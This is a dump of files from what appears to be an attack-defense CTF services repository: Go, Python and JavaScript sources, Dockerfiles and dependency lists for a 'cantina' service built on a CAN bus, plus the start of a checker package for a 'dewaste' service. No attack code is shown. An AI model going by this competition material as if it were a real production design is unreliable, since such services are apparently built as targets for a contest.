/cantina/src/components/client/nes/controller.go: -------------------------------------------------------------------------------- 1 | package nes 2 | 3 | const ( 4 | ButtonA = iota 5 | ButtonB 6 | ButtonSelect 7 | ButtonStart 8 | ButtonUp 9 | ButtonDown 10 | ButtonLeft 11 | ButtonRight 12 | ) 13 | 14 | type Controller struct { 15 | buttons [8]bool 16 | index byte 17 | strobe byte 18 | } 19 | 20 | func NewController() *Controller { 21 | return &Controller{} 22 | } 23 | 24 | func (c *Controller) SetButtons(buttons [8]bool) { 25 | c.buttons = buttons 26 | } 27 | 28 | func (c *Controller) Read() byte { 29 | value := byte(0) 30 | if c.index < 8 && c.buttons[c.index] { 31 | value = 1 32 | } 33 | c.index++ 34 | if c.strobe&1 == 1 { 35 | c.index = 0 36 | } 37 | return value 38 | } 39 | 40 | func (c *Controller) Write(value byte) { 41 | c.strobe = value 42 | if c.strobe&1 == 1 { 43 | c.index = 0 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /cantina/src/components/client/player/run.go: -------------------------------------------------------------------------------- 1 | package player 2 | 3 | import ( 4 | "log" 5 | "runtime" 6 | 7 | "github.com/gordonklaus/portaudio" 8 | 9 | "cantina/client/nes" 10 | ) 11 | 12 | func init() { 13 | // we need a parallel OS thread to avoid audio stuttering 14 | runtime.GOMAXPROCS(2) 15 | 16 | // we need to keep OpenGL calls on a single thread 17 | //runtime.LockOSThread() 18 | } 19 | 20 | func Run(apu *nes.APU, serverAddress string) { 21 | // initialize audio 22 | portaudio.Initialize() 23 | defer portaudio.Terminate() 24 | 25 | audio := NewAudio() 26 | if err := audio.Start(); err != nil { 27 | log.Fatalln(err) 28 | } 29 | defer audio.Stop() 30 | 31 | apu.SetAudioChannel(audio.channel) 32 | apu.SetAudioSampleRate(audio.sampleRate) 33 | // run director 34 | director := NewDirector(audio, apu, serverAddress) 35 | director.Start() 36 | } 37 | -------------------------------------------------------------------------------- /cantina/src/components/gateway/.gitignore: -------------------------------------------------------------------------------- 1 | gateway 2 | -------------------------------------------------------------------------------- /cantina/src/components/gateway/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | WORKDIR /cantina/gocommon 4 | 5 | #Set build arguments 6 | ARG BUILDOS 7 | ARG BUILDARCH 8 | ARG BUILDNAME 9 | 10 | COPY gocommon/go.mod gocommon/go.sum ./ 11 | RUN go mod tidy 12 | COPY gocommon/. ./ 13 | RUN mkdir /app && chown -R 1000:1000 /app 14 | 15 | ENV BUILDNAME=gateway 16 | 17 | WORKDIR /cantina/$BUILDNAME 18 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 19 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 20 | RUN go mod tidy 21 | COPY $BUILDNAME/. ./ 22 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./main.go 23 | WORKDIR /app 24 | 25 | FROM alpine:3.16 as gw-copy 26 | ENV BUILDNAME=gateway 27 | COPY --from=base /app/gateway /app/gateway 28 | CMD ["/app/gateway"] 29 | 30 | -------------------------------------------------------------------------------- /cantina/src/components/gateway/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/gateway 2 | 3 | go 1.19 4 | 5 | replace cantina/common => ../gocommon 6 | 7 | require ( 8 | cantina/common v0.0.0-00010101000000-000000000000 9 | github.com/vmihailenco/msgpack/v5 v5.3.5 10 | ) 11 | 12 | require github.com/zekroTJA/timedmap v1.4.0 // indirect 13 | 14 | require ( 15 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 16 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd 17 | ) 18 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/can/consts.go: -------------------------------------------------------------------------------- 1 | package can 2 | 3 | const CANFD_MAX_PAYLOAD = 64 4 | const CAN_MTU = 16 5 | const CANFD_MTU = 72 6 | const CAN_EFF_FLAG uint32 = 0x80000000 7 | const CAN_RTR_FLAG uint32 = 0x40000000 8 | const CAN_ERR_FLAG uint32 = 0x20000000 9 | const CAN_EXTENDED_MASK uint32 = 0x1FFFFFFF 10 | const CAN_STANDARD_MASK uint32 = 0x000007FF 11 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/extradata.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | import ( 4 | "errors" 5 | ) 6 | 7 | const edSize = 30 8 | 9 | type ExtraData struct { 10 | Value []byte 11 | } 12 | 13 | func (e ExtraData) FieldSize() int { 14 | return edSize 15 | } 16 | 17 | func (e ExtraData) ToBytes(dst []byte) []byte { 18 | data := make([]byte, edSize) 19 | if len(e.Value) > 0 { 20 | copy(data, e.Value[:]) 21 | } 22 | return append(dst, data...) 23 | } 24 | 25 | func (e *ExtraData) FromBytes(data []byte) (n int, err error) { 26 | if len(data) < edSize { 27 | err = errors.New("Not enough data for ExtraData") 28 | return 29 | } 30 | 31 | e.Value = make([]byte, edSize) 32 | copy(e.Value, data[:edSize]) 33 | n = edSize 34 | return 35 | } 36 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/field.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | type Field interface { 4 | FieldSize() int 5 | FromBytes([]byte) (int, error) 6 | ToBytes([]byte) []byte 7 | } 8 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/msglength.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | import ( 4 | "encoding/binary" 5 | "errors" 6 | ) 7 | 8 | const mlSize = 2 9 | 10 | type MessageLength struct { 11 | Value uint16 12 | } 13 | 14 | func (m MessageLength) FieldSize() int { 15 | return mlSize 16 | } 17 | 18 | func (m MessageLength) ToBytes(dst []byte) []byte { 19 | arr := [mlSize]byte{} 20 | binary.BigEndian.PutUint16(arr[:], m.Value) 21 | return append(dst, arr[:]...) 22 | } 23 | 24 | func (m *MessageLength) FromBytes(data []byte) (n int, err error) { 25 | if len(data) < m.FieldSize() { 26 | err = errors.New("Not enough data for MessageLength") 27 | return 28 | } 29 | 30 | m.Value = binary.BigEndian.Uint16(data[:mlSize]) 31 | n = mlSize 32 | return 33 | } 34 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/sequence.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | import ( 4 | "errors" 5 | ) 6 | 7 | const seqSize = 1 8 | 9 | type SequenceNumber struct { 10 | Value uint8 11 | } 12 | 13 | func (s SequenceNumber) FieldSize() int { 14 | return seqSize 15 | } 16 | 17 | func (s SequenceNumber) ToBytes(dst []byte) []byte { 18 | arr := [seqSize]byte{} 19 | arr[0] = s.Value 20 | return append(dst, arr[:]...) 21 | } 22 | 23 | func (s *SequenceNumber) FromBytes(data []byte) (n int, err error) { 24 | if len(data) < s.FieldSize() { 25 | err = errors.New("Not enough data for SequenceNumber") 26 | return 27 | } 28 | 29 | s.Value = data[:seqSize][0] 30 | n = seqSize 31 | return 32 | } 33 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/shared.go: -------------------------------------------------------------------------------- 1 | package canopy 2 | 3 | type MessageIds struct { 4 | Start uint32 5 | Data uint32 6 | ReplyStart uint32 7 | ReplyData uint32 8 | } 9 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/components/components.go: -------------------------------------------------------------------------------- 1 | package components 2 | 3 | import ( 4 | "cantina/common/can" 5 | ) 6 | 7 | type RecvHandler func(*can.Message) error 8 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/common 2 | 3 | go 1.19 4 | 5 | require ( 6 | github.com/vmihailenco/msgpack/v5 v5.3.5 7 | github.com/zekroTJA/timedmap v1.4.0 8 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 9 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd 10 | ) 11 | 12 | require github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/structs/tickets.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | type Ticket struct { 4 | _msgpack struct{} `msgpack:",as_array"` 5 | TicketId uint32 6 | Timestamp uint32 7 | } 8 | 9 | type TicketSigned struct { 10 | _msgpack struct{} `msgpack:",as_array"` 11 | TicketData []byte 12 | Signature []byte 13 | } 14 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY jukebox-front/requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY jukebox-front/. /app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | EXPOSE 10024 22 | 23 | CMD /app/run.sh 24 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | Authlib==1.0.1 3 | certifi==2022.6.15.1 4 | cffi==1.15.1 5 | click==8.1.3 6 | cryptography==38.0.1 7 | h11==0.12.0 8 | httpcore==0.15.0 9 | httpx==0.23.0 10 | idna==3.3 11 | itsdangerous==2.1.2 12 | Jinja2==3.1.2 13 | kaitaistruct==0.10 14 | MarkupSafe==2.1.1 15 | pycparser==2.21 16 | python-multipart==0.0.5 17 | PyYAML==6.0 18 | rfc3986==1.5.0 19 | six==1.16.0 20 | sniffio==1.3.0 21 | starlette==0.20.4 22 | starlette-authlib==0.1.12 23 | uvicorn==0.18.3 24 | aiosqlite 25 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10024 --reload --debug 4 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS files ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL, 5 | track TEXT NOT NULL, 6 | game TEXT NOT NULL, 7 | author TEXT NOT NULL, 8 | filename TEXT NOT NULL 9 | ); 10 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/assets/jukebox.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/src/components/jukebox-front/static/assets/jukebox.jpg -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .top-nav { 2 | padding: var(--spacing); 3 | border-bottom: 1px solid #343434; 4 | background-color: #11191f; 5 | position: fixed; 6 | top: 0; 7 | left: 0; 8 | right: 0; 9 | width: 100%; 10 | z-index: 9999; 11 | } 12 | 13 | .menu-item-image { 14 | text-align: center; 15 | } 16 | 17 | #app { 18 | margin-top: 5rem; 19 | } 20 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | CANtina: Jukebox 9 | 10 | 11 | 13 | 14 |
15 |
16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/nav/AbstractNav.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_info) { 3 | this.user_info = user_info; 4 | } 5 | 6 | async getHtml() { 7 | return ` 8 | 11 | `; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/nav/Auth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 17 | `; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/nav/UnAuth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 16 | `; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/views/AbstractView.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_data) { 3 | this.user_data = user_data; 4 | } 5 | 6 | setTitle(title) { 7 | document.title = title; 8 | } 9 | 10 | async registerEventHandlers() { 11 | } 12 | 13 | async getHtml() { 14 | return ""; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/vgm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/src/components/jukebox-front/vgm/__init__.py -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/jukebox/structs.go: -------------------------------------------------------------------------------- 1 | package jukebox 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "cantina/common/tickets" 8 | "cantina/jukebox/streamer" 9 | jtickets "cantina/jukebox/tickets" 10 | "log" 11 | ) 12 | 13 | type Env struct { 14 | SymmCipher *cipher.Cipher 15 | KeyExchange *kex.Client 16 | Log *log.Logger 17 | 18 | UserDbRequest *canopy.Client 19 | 20 | JukeboxRequest *canopy.Server 21 | JukeboxReplyBuilder canopy.ReplyBuilder 22 | 23 | UserRequest *canopy.Server 24 | UserRequestBuilder canopy.ReplyBuilder 25 | UserRequestSession canopy.SessionInitialization 26 | 27 | TicketManager *tickets.TicketManager 28 | UserTicketManager *jtickets.UserTicketManager 29 | 30 | Streamer *streamer.Streamer 31 | 32 | DataDir string 33 | } 34 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/routes/context.go: -------------------------------------------------------------------------------- 1 | package routes 2 | 3 | import "cantina/jukebox/jukebox" 4 | 5 | type RouterContext struct { 6 | Env *jukebox.Env 7 | } 8 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/static/cantina.vgm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/src/components/jukebox-proxy/static/cantina.vgm -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/structs/structs.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | type Ticket struct { 4 | _msgpack struct{} `msgpack:",as_array"` 5 | TicketId uint32 6 | Timestamp uint32 7 | } 8 | 9 | type TicketSigned struct { 10 | _msgpack struct{} `msgpack:",as_array"` 11 | TicketData []byte 12 | Signature []byte 13 | } 14 | 15 | type FileTicket struct { 16 | _msgpack struct{} `msgpack:",as_array"` 17 | TicketId string 18 | Timestamp uint32 19 | } 20 | 21 | type SignedRequest struct { 22 | Data string 23 | Signature string 24 | } 25 | 26 | type FileAccessRequest struct { 27 | Cmd string 28 | Dir string 29 | User string 30 | File string 31 | Ticket FileTicket 32 | } 33 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/.gitignore: -------------------------------------------------------------------------------- 1 | keyserver 2 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | #Set build arguments 4 | ARG BUILDOS 5 | ARG BUILDARCH 6 | ARG BUILDNAME 7 | 8 | RUN apk add build-base 9 | 10 | WORKDIR /cantina/gocommon 11 | COPY gocommon/go.mod gocommon/go.sum ./ 12 | RUN go mod tidy 13 | COPY gocommon/. ./ 14 | 15 | RUN mkdir /app && chown -R 1000:1000 /app 16 | 17 | ENV BUILDNAME=keyserver 18 | WORKDIR /cantina/$BUILDNAME 19 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 20 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 21 | RUN go mod tidy 22 | COPY $BUILDNAME/ . 23 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./keyserver.go 24 | WORKDIR /app 25 | 26 | FROM alpine:3.16 as ksv-copy 27 | ENV BUILDNAME=keyserver 28 | COPY --from=base /app/$BUILDNAME /app/ksv 29 | CMD ["/app/ksv"] 30 | 31 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/keyserver 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | github.com/vmihailenco/msgpack/v5 v5.3.5 8 | golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 9 | ) 10 | 11 | require ( 12 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 // indirect 14 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd // indirect 15 | ) 16 | 17 | replace cantina/common => ../gocommon 18 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/ks/structs.go: -------------------------------------------------------------------------------- 1 | package ks 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "log" 8 | ) 9 | 10 | type Env struct { 11 | SymmCipher *cipher.Cipher 12 | KeyExchange *kex.Server 13 | Log *log.Logger 14 | 15 | TicketCreation *canopy.Server 16 | TicketReplyBuilder canopy.ReplyBuilder 17 | 18 | DataDir string 19 | } 20 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/.gitignore: -------------------------------------------------------------------------------- 1 | order-db 2 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | #Set build arguments 4 | ARG BUILDOS 5 | ARG BUILDARCH 6 | ARG BUILDNAME 7 | 8 | RUN apk add build-base 9 | 10 | WORKDIR /cantina/gocommon 11 | COPY gocommon/go.mod gocommon/go.sum ./ 12 | RUN go mod tidy 13 | COPY gocommon/. ./ 14 | 15 | RUN mkdir /app && chown -R 1000:1000 /app 16 | 17 | ENV BUILDNAME=order-db 18 | WORKDIR /cantina/$BUILDNAME 19 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 20 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 21 | RUN go mod tidy 22 | COPY $BUILDNAME/. ./ 23 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./order-db.go 24 | WORKDIR /app 25 | 26 | FROM alpine:3.16 as odb-copy 27 | ENV BUILDNAME=order-db 28 | COPY --from=base /app/$BUILDNAME /app/odb 29 | CMD ["/app/odb"] 30 | 31 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/order-db 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | github.com/vmihailenco/msgpack/v5 v5.3.5 8 | golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 9 | ) 10 | 11 | require ( 12 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 // indirect 14 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd // indirect 15 | ) 16 | 17 | replace cantina/common => ../gocommon 18 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/odb/structs.go: -------------------------------------------------------------------------------- 1 | package odb 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "log" 8 | ) 9 | 10 | type Env struct { 11 | SymmCipher *cipher.Cipher 12 | KeyExchange *kex.Client 13 | Log *log.Logger 14 | 15 | OrderCreation *canopy.Server 16 | OrderCreationBuilder canopy.ReplyBuilder 17 | 18 | OrderPickup *canopy.Server 19 | OrderPickupBuilder canopy.ReplyBuilder 20 | OrderPickupSession canopy.SessionInitialization 21 | 22 | DataDir string 23 | } 24 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/.gitignore: -------------------------------------------------------------------------------- 1 | point-of-sale 2 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | #Set build arguments 4 | ARG BUILDOS 5 | ARG BUILDARCH 6 | ARG BUILDNAME 7 | 8 | RUN apk add build-base 9 | 10 | WORKDIR /cantina/gocommon 11 | COPY gocommon/go.mod gocommon/go.sum ./ 12 | RUN go mod tidy 13 | COPY gocommon/. ./ 14 | 15 | RUN mkdir /app && chown -R 1000:1000 /app 16 | 17 | ENV BUILDNAME=point-of-sale 18 | WORKDIR /cantina/$BUILDNAME 19 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 20 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 21 | RUN go mod tidy 22 | COPY $BUILDNAME/. ./ 23 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./point-of-sale.go 24 | WORKDIR /app 25 | 26 | FROM alpine:3.16 as pos-copy 27 | ENV BUILDNAME=point-of-sale 28 | COPY --from=base /app/$BUILDNAME /app/pos 29 | COPY ./point-of-sale/order-items.yaml /app 30 | CMD ["/app/pos"] 31 | 32 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/order-items.yaml: -------------------------------------------------------------------------------- 1 | categories: 2 | - name: "Pasta" 3 | items: 4 | - id: 0 5 | name: "Carbonara" 6 | price: 10 7 | image_url: "carbonara.jpg" 8 | - name: "Pizza" 9 | items: 10 | - id: 0 11 | name: "Pizza Hawaii" 12 | price: 15 13 | image_url: "cancer.jpg" 14 | 15 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/pos/structs.go: -------------------------------------------------------------------------------- 1 | package pos 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "cantina/common/tickets" 8 | "log" 9 | "sync" 10 | ) 11 | 12 | type Env struct { 13 | SymmCipher *cipher.Cipher 14 | KeyExchange *kex.Client 15 | OrderCreation *canopy.Client 16 | TicketCreation *canopy.Client 17 | Log *log.Logger 18 | OrderItems *ItemOverview 19 | TicketManager *tickets.TicketManager 20 | GamebotPubKey []byte 21 | SessionLock sync.RWMutex 22 | } 23 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/routes/context.go: -------------------------------------------------------------------------------- 1 | package routes 2 | 3 | import ( 4 | "cantina/point-of-sale/pos" 5 | ) 6 | 7 | type RouterContext struct { 8 | Env *pos.Env 9 | } 10 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/routes/items.go: -------------------------------------------------------------------------------- 1 | package routes 2 | 3 | import ( 4 | "net/http" 5 | "github.com/gin-gonic/gin" 6 | ) 7 | 8 | 9 | func (rc *RouterContext) GetMenuItems(c *gin.Context) { 10 | c.JSON(http.StatusOK, rc.Env.OrderItems) 11 | } 12 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY . /app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | #CMD python main.py 22 | EXPOSE 10026 23 | 24 | CMD /app/run.sh 25 | 26 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/cleanup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import signal 3 | import sqlite3 4 | import os 5 | from pathlib import Path 6 | from threading import Event 7 | 8 | 9 | def do_cleanup(data_dir: Path): 10 | # Cleanup sqlite database 11 | con = sqlite3.connect(data_dir / "user.db") 12 | with con: 13 | cur = con.cursor() 14 | cur.execute('delete from users where created <= datetime("now", "-30 minute")') 15 | print(f"Deleted rows: {cur.rowcount}") 16 | con.close() 17 | 18 | 19 | if __name__ == '__main__': 20 | stop = Event() 21 | 22 | def quit(_, __): 23 | stop.set() 24 | for sig in('TERM', 'HUP', 'INT'): 25 | signal.signal(getattr(signal, 'SIG'+sig), quit) 26 | 27 | data_dir = Path(os.environ.get("DATA_DIR", "/data")) 28 | 29 | while not stop.is_set(): 30 | do_cleanup(data_dir) 31 | stop.wait(120) 32 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | click==8.1.3 3 | fastapi==0.83.0 4 | h11==0.13.0 5 | idna==3.3 6 | pydantic==1.10.2 7 | PyYAML==6.0 8 | sniffio==1.3.0 9 | starlette==0.19.1 10 | typing_extensions==4.3.0 11 | uvicorn==0.18.3 12 | cryptography 13 | msgpack 14 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10026 --reload --debug 4 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS users ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL UNIQUE, 5 | authtoken TEXT NOT NULL 6 | ); 7 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-proxy/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/user-db 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | github.com/vmihailenco/msgpack/v5 v5.3.5 8 | golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 9 | ) 10 | 11 | require ( 12 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 // indirect 14 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd // indirect 15 | ) 16 | 17 | replace cantina/common => ../gocommon 18 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-proxy/udb/structs.go: -------------------------------------------------------------------------------- 1 | package udb 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "log" 8 | ) 9 | 10 | type Env struct { 11 | SymmCipher *cipher.Cipher 12 | KeyExchange *kex.Client 13 | Log *log.Logger 14 | 15 | JukeboxRequest *canopy.Server 16 | JukeboxReplyBuilder canopy.ReplyBuilder 17 | 18 | UserRequest *canopy.Server 19 | UserRequestBuilder canopy.ReplyBuilder 20 | UserRequestSession canopy.SessionInitialization 21 | 22 | DataDir string 23 | } 24 | -------------------------------------------------------------------------------- /dewaste/.gitignore: -------------------------------------------------------------------------------- 1 | /**/.idea/ 2 | /**/vendor/ -------------------------------------------------------------------------------- /dewaste/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY dejavu.ttf /checker/dejavu.ttf 11 | USER ctf-checkermaster 12 | ENV CTF_CHECKERSCRIPT /checker/checker.py 13 | 14 | # set this to _checker 15 | ENV CTF_SERVICE dewaste_checker1 16 | 17 | WORKDIR /tmp 18 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/dejavu.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/checkers/checker1/dejavu.ttf -------------------------------------------------------------------------------- /dewaste/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 